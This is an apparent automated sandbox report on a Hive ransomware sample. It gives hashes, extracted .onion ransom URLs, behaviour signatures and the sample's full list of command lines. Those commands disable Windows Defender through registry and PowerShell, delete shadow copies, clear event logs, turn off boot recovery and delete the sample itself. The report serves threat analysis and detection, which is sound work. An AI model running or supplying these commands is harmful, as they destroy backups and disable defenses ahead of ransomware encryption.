Analysis
- max time kernel: 103s
- max time network: 19s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 05-01-2022 13:01
Static task: static1
Behavioral task: behavioral1
  Sample: setup.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: setup.exe
  Resource: win10-en-20211208
General
- Target: setup.exe
- Size: 3.9MB
- MD5: 0e4d44dde522c07d09d9e3086cfae803
- SHA1: d8dc26e2094869a0da78ecb47494c931419302dc
- SHA256: 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
- SHA512: ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
Malware Config
Extracted
- Path: C:\Program Files\7-Zip\n8pw_HOW_TO_DECRYPT.txt
- Family: hive
- URLs:
  http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
  http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses the mpcmdrun utility to delete all AV definitions.
  Processes: MpCmdRun.exe (PID 2132)
- Hive
  A ransomware written in Golang, first seen in June 2021.
- Modifies security service (2 TTPs, 1 IoC)
  Processes: reg.exe
  IoC: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"
- Clears Windows event logs (1 TTP)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes: bcdedit.exe (PID 2068), bcdedit.exe (PID 2092)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Drops file in Program Files directory (64 IoCs)
  Processes: setup.exe
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (PID 1060)
- Opens file in notepad (likely ransom note) (1 IoC)
  Processes: notepad.exe (PID 2580)
- Runs net.exe
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe (PID 2164), powershell.exe (PID 2248), setup.exe (PID 1912)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: wevtutil.exe, wmic.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: setup.exe, net.exe
Processes
- [PID 1912] C:\Users\Admin\AppData\Local\Temp\setup.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\setup.exe"
  Signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  - [PID 596] C:\Windows\system32\net.exe
    Command line: net.exe stop "NetMsmqActivator" /y
    Signatures: Suspicious use of WriteProcessMemory
    - [PID 756] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  - [PID 1240] C:\Windows\system32\net.exe
    Command line: net.exe stop "SamSs" /y
    Signatures: Suspicious use of WriteProcessMemory
    - [PID 1492] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 stop "SamSs" /y
  - [PID 112] C:\Windows\system32\net.exe
    Command line: net.exe stop "SDRSVC" /y
    Signatures: Suspicious use of WriteProcessMemory
    - [PID 1852] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 stop "SDRSVC" /y
  - [PID 688] C:\Windows\system32\net.exe
    Command line: net.exe stop "SstpSvc" /y
    Signatures: Suspicious use of WriteProcessMemory
    - [PID 900] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 stop "SstpSvc" /y
  - [PID 1832] C:\Windows\system32\net.exe
    Command line: net.exe stop "UI0Detect" /y
    Signatures: Suspicious use of WriteProcessMemory
    - [PID 436] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 stop "UI0Detect" /y
  - [PID 1812] C:\Windows\system32\net.exe
    Command line: net.exe stop "VSS" /y
    Signatures: Suspicious use of WriteProcessMemory
    - [PID 1216] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 stop "VSS" /y
  - [PID 1328] C:\Windows\system32\net.exe
    Command line: net.exe stop "wbengine" /y
    Signatures: Suspicious use of WriteProcessMemory
    - [PID 1904] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 stop "wbengine" /y
  - [PID 1752] C:\Windows\system32\net.exe
    Command line: net.exe stop "WebClient" /y
    Signatures: Suspicious use of WriteProcessMemory
    - [PID 632] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 stop "WebClient" /y
  - [PID 1228] C:\Windows\system32\sc.exe
    Command line: sc.exe config "NetMsmqActivator" start= disabled
  - [PID 1004] C:\Windows\system32\sc.exe
    Command line: sc.exe config "SamSs" start= disabled
  - [PID 2040] C:\Windows\system32\sc.exe
    Command line: sc.exe config "SDRSVC" start= disabled
  - [PID 1500] C:\Windows\system32\sc.exe
    Command line: sc.exe config "SstpSvc" start= disabled
  - [PID 876] C:\Windows\system32\sc.exe
    Command line: sc.exe config "UI0Detect" start= disabled
  - [PID 868] C:\Windows\system32\sc.exe
    Command line: sc.exe config "VSS" start= disabled
  - [PID 1700] C:\Windows\system32\sc.exe
    Command line: sc.exe config "wbengine" start= disabled
  - [PID 908] C:\Windows\system32\sc.exe
    Command line: sc.exe config "WebClient" start= disabled
  - [PID 1636] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - [PID 2020] C:\Windows\system32\reg.exe
    Command line: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  - [PID 1704] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  - [PID 1800] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  - [PID 1316] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  - [PID 1208] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  - [PID 1200] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  - [PID 1512] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  - [PID 632] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  - [PID 1628] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  - [PID 1864] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  - [PID 1076] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  - [PID 560] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  - [PID 1724] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  - [PID 932] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  - [PID 2004] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  - [PID 1616] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  - [PID 836] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  - [PID 1120] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  - [PID 1556] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  - [PID 1660] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  - [PID 1348] C:\Windows\system32\reg.exe
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  - [PID 1964] C:\Windows\system32\reg.exe
    Command line: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  - [PID 1644] C:\Windows\system32\reg.exe
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  - [PID 1944] C:\Windows\system32\reg.exe
    Command line: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  - [PID 1088] C:\Windows\system32\reg.exe
    Command line: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  - [PID 1116] C:\Windows\system32\reg.exe
    Command line: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  - [PID 1824] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  - [PID 2024] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  - [PID 1352] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  - [PID 1080] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  - [PID 1772] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    Signatures: Modifies security service
  - [PID 880] C:\Windows\system32\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - [PID 1060] C:\Windows\system32\vssadmin.exe
    Command line: vssadmin.exe delete shadows /all /quiet
    Signatures: Interacts with shadow copies
  - [PID 1156] C:\Windows\system32\wevtutil.exe
    Command line: wevtutil.exe cl system
    Signatures: Suspicious use of AdjustPrivilegeToken
  - [PID 1612] C:\Windows\system32\wevtutil.exe
    Command line: wevtutil.exe cl security
    Signatures: Suspicious use of AdjustPrivilegeToken
  - [PID 1684] C:\Windows\system32\wevtutil.exe
    Command line: wevtutil.exe cl application
    Signatures: Suspicious use of AdjustPrivilegeToken
  - [PID 1696] C:\Windows\System32\Wbem\wmic.exe
    Command line: wmic.exe SHADOWCOPY /nointeractive
    Signatures: Suspicious use of AdjustPrivilegeToken
  - [PID 1484] C:\Windows\System32\Wbem\wmic.exe
    Command line: wmic.exe shadowcopy delete
    Signatures: Suspicious use of AdjustPrivilegeToken
  - [PID 2068] C:\Windows\system32\bcdedit.exe
    Command line: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    Signatures: Modifies boot configuration data using bcdedit
  - [PID 2092] C:\Windows\system32\bcdedit.exe
    Command line: bcdedit.exe /set {default} recoveryenabled no
    Signatures: Modifies boot configuration data using bcdedit
  - [PID 2112] C:\Windows\system32\cmd.exe
    Command line: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    - [PID 2132] C:\Program Files\Windows Defender\MpCmdRun.exe
      Command line: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      Signatures: Deletes Windows Defender Definitions
  - [PID 2144] C:\Windows\system32\cmd.exe
    Command line: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    - [PID 2164] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell Set-MpPreference -DisableIOAVProtection $true
      Signatures: Suspicious behavior: EnumeratesProcesses
  - [PID 2228] C:\Windows\system32\cmd.exe
    Command line: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    - [PID 2248] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell Set-MpPreference -DisableRealtimeMonitoring $true
      Signatures: Suspicious behavior: EnumeratesProcesses
  - [PID 2580] C:\Windows\system32\notepad.exe
    Command line: notepad.exe C:\n8pw_HOW_TO_DECRYPT.txt
    Signatures: Opens file in notepad (likely ransom note)
  - [PID 2588] C:\Windows\system32\cmd.exe
    Command line: cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    - [PID 2608] C:\Windows\system32\PING.EXE
      Command line: ping.exe -n 5 127.0.0.1
      Signatures: Runs ping.exe
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 51130561d2e22c25f9e6fe284de11ef2
  SHA1: 583784e227e6c22a304088908ceb9211eaed4dae
  SHA256: b3ac1c99c19aad0eed4ed93ccb9b8dae37440751ea61c470f44da767a4d64ac9
  SHA512: e4adfbaacbce53c4910e26d93c82f70bd8418ed560246719061fd0fd5983d00920efdd421b8f4c0a06de3fe4488d41849fbfa5744c46b593fa0490418d59cf68
- MD5: d3eca3baec61c36c9353ef1699b8bfca
  SHA1: f084193262e0d462165cfac58e1422ab90df7514
  SHA256: 3ef5776a2dfd960f996ab765efa2b117d3e3135dc8e196aa7bdc525bd4125678
  SHA512: 8d8eb00e0764ea07a999d0f07bd21f4f4b8169f19673de0cea833670c38edd41792136a63036477bebeb2a0fbbca5f4faafb381f8fd4ffb178d4209e073e2a17